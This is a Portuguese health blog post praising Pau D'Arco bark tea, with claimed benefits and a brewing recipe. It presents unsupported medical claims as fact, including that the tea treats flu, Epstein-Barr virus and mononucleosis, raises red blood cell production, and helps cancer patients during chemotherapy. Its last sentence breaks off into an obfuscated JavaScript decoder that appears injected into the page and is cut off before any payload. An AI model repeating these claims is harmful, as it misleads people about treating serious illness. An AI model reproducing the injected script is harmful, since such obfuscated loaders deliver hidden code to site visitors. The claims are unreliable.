Pau D’Arco – um chá que vai querer conhecer
Já ouviu falar no chá de Pau D’Arco? Não?! Então esta é uma belíssima oportunidade para conhecer os muitos benefícios desta infusão. A planta do Pau D’Arco, conhecida como ipê amarelo, tem sido usada no tratamento de várias doenças como a anemia, gripe ou até a presença de fungos nas unhas.
É a partir da casca interna desta árvore que poderemos melhorar a nossa saúde. A casca produz um chá de agradável aroma e cor avermelhada. Por causa dos dois fitoquímicos lapachol e beta-lapachona que existem nesta casca, o chá ajuda a combater várias doenças.
1- Trata fungos
O Pau D’Arco é usado, sobretudo, para infecções fúngicas. Os fitoquímicos que existem na casca têm uma acção semelhante a alguns medicamentos. Para tratar uma infecção por fungos pode beber o chá de Pau D’Arco, ou juntar a casca em pó a uma pomada, ou cozinhar uma determinada quantidade concentrada e aplicar várias vezes. Pode também usar estes tratamentos para micoses, pé de atleta, ou fungos nas unhas.
2- É anti-inflamatório
As baixas doses de formulações isoladas dos dois fitoquímicos, lapachol e beta-lapachona, impulsionam o sistema imunológico do corpo. Esta situação, a par das suas propriedades anti-virais, torna o Pau D’Arco adequado para o tratamento do vírus da gripe, vírus de Epstein-Barr, síndrome de fadiga crónica e mononucleose.
A quercetina é outro componente activo do Pau D’Arco. É um flavonóide derivado de plantas que tem propriedades anti-inflamatórias. Ajuda a reduzir problemas inflamatórios, sobretudo no estômago e intestinos, o que faz com que seja eficaz para a colite e síndrome do intestino irritável. Também é usado no tratamento da fibromialgia e reumatismo.
3- Outros benefícios
Esta planta também funciona como um cicatrizante para feridas internas e externas. Isto porque o seu consumo aumenta a produção dos glóbulos vermelhos e da hemoglobina pelo estímulo na medula óssea.
O Pau D’Arco é usado com regularidade como complemento no tratamento quimioterápico contra o cancro porque diminui os efeitos deste e estimula o sistema imunológico no combate da doença.
Saiba agora como preparar o chá Pau D’Arco
A planta de Pau D’Arco é consumida sob a forma de chá feito a partir da casca.
O que é necessário para preparar o chá:
Ingredientes:
– ½ colher de sopa de Pau D’Arco
– 1 chávena de água a ferver
Preparação:
Coloque água num recipiente e leve ao lume. Quando a água estiver a ferver, desligue. Numa chávena disponha a erva do Pau D’Arco e cubra com a água a ferver. Tape a chávena e deixe repousar mais ou menos dez minutos. Depois coe e saboreie o seu chá quentinho.
Muita atenção: a dose recomendada é de duas chávenas por dia, bebidas alternadamente. Se tem alguns dos problemas para os quais este chá é recomendado, vá lá, experimente, e cuide da sua saúde! E já agora, rápidas melhoras, se for esse o caso.
Ficou com vontade de provar o chá de Pau D'Arco? Pode beber em infusão ou então tomar 3 colheres/ dia. Clique na imagem abaixo e saiba tudo!
Se gostou de conhecer os benefícios do chá de Pau D'Arco, conheça ainda os benefícios do abacate e do function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa